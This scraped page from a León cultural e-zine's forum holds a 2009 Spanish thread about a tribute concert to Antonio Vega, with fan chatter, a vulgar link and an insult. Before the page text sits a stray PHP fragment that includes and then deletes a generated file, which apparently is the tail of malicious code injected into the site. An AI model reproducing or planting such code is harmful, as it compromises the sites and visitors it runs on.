");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Opinodromo de el Rin.com, E-zine Inquieto y Agenda Cultural de León
Logo elrin.com
uvedoble-uvedoble-uvedoble-punto-elrin-punto-com elRin
Los datos de elRin.COM 1840 noticias publicadas
1690 Rineros registrados
0 Rineros conectados
6 anonimos conectados
652 mensajes en el foro
14069 mensajes en el foro antiguo
OpinodromoEl webmaster se reserva el derecho de eliminar aquellos mensajes que sean ofensivos a petición del aludido o por propia iniciativa.
Volver al índice

¿Pero nadie va a contar nada del miércoles Gran Antonio Café Vega?

Algún detalle...

pacho - 13 Nov 2009

yo no

yo no pude ir, estaba liado acabando la web del purple weekend, pero me han contado que fue mucha gente y que estuvo guay.

tu tocarías algo no? o no pudiste venir?

Oscariolo - 13 Nov 2009

Pues yo mismo

Es verdad que fue una bonita noche. El Gran Cafe petadísimo y además un público muy entregado. Debieron sonar unas 25 canciones más o menos (a 3 por banda) y ni sé la cantidad de músicos que participaron. Unas 3 horas de música, además todo muy bien organizado, los cambios de formación, el sonido (a Buru le debimos volver loco....), etc.... Y me sorprendió lo bien que quedaron todas las canciones, tanto en acústico como en eléctrico muy curradas.

Yo creo que hay que felicitar a Mario y a Ramón, porque debe haber sido una movida ponerse de acuerdo con todos los músicos y además los dos se lo curraron toda la noche, tocando eléctrica, acústica, bajo, cantando,.... en muchas de las canciones. Yo no soy fan de Antonio, es verdad, pero dudo que haya otro artista en España (vivo o muerto) del que puedas tocar 25 canciones distintas en una noche y que ninguna apeste.

Aníbal S. - 13 Nov 2009

No estaba en León, pero

Me quedé con muchas ganas de estar por allí ese miércoles.

Gran web Purple, por cierto.

pacho - 13 Nov 2009

oks

ok, no sabía si preguntabas para saber opiniones del resultado, incluso estando tu, o para saber qué le pareció al personal.

gracias hombre. por la parte que me toca.

Oscariolo - 13 Nov 2009

Era lo 2º. Menos mal

que nos queda Anibal (en este caso pronúnciese en agudo: Anibál)...

pacho - 13 Nov 2009

si apesta

más de una apesta

:D

M.Campo Vidal - 13 Nov 2009

Así rima

Un saludo Pacho, hubieras disfrutado mucho el miércoles, seguro.

Aníbal S. - 13 Nov 2009

No no

Eso no apesta, ¿quieres saber lo que apesta?:

http://www.bragasusadas.com/">http://www.bragasusadas.com/

Aníbal S. - 13 Nov 2009

DIOOOSSSS

JODEEEEERRRRR puagh

Miryam - 14 Nov 2009

dedícate a la cocina...

Pacho, muy buenos los artículos que escribes sobre alta cocina en León, el de la bodega asador el Capricho en Jimenez de Jamuz fue la ostia, que fantástico lugar para comer carnaca roja. Deja la música!!! la cocina y el buen yantar es lo tuyo, te lo dice un fan...

M.Campo Vidal - 14 Nov 2009

Coñe Pacho

Si hubieras estado tú sí que hubiera ido... pero ya sabes cómo anda el tema y dónde estaba viendo otro homenaje, de quien por cierto, también se pueden tocar más de 25 canciones, alguna más, sin que apesten.

Por cierto, si buscas por casa un mechero bic azul con una araña colgando que sepas que "lo he adoptado". No me preguntes.

Nacho, sigues siendo imbécil, y mejoras con la práctica en tu imbecibilidad, cada día lo eres más. ¿No has pensado en mirártelo?, y por cierto, ¿no te pirabas del foro?. A mi me da lo mismo que me da igual, dices sandeces, yo me río de ti, y cuando me da la gana me meto contigo y punto... pero al margen de ser imbécil podías ser un ¿hombre? de palabra, ¿no?.

Horlo - 15 Nov 2009

Supongo....

....que te refieres a Enrique Urquijo. Bueno, cuestión de gustos. Un saludo.

Aníbal S. - 17 Nov 2009

Es cuestión de gustos. Hoy hace justo diez años de su muerte. Habrá quien no le guste, pero su vida era música, y sus letras, le pese a quien le pese, geniales. Babosas y tristes y toda la parafernalia de calificativos que se quieran decir. Para mi era un genio.

Horlo - 17 Nov 2009

Volver al índice
Opinodromo

Último mensaje

Opinodromo antiguo
Tablón de anuncios

Estamos en ello

Estamos trabajando en el nuevo tablón de anuncios. Todavia no está operativo.

Grupos de León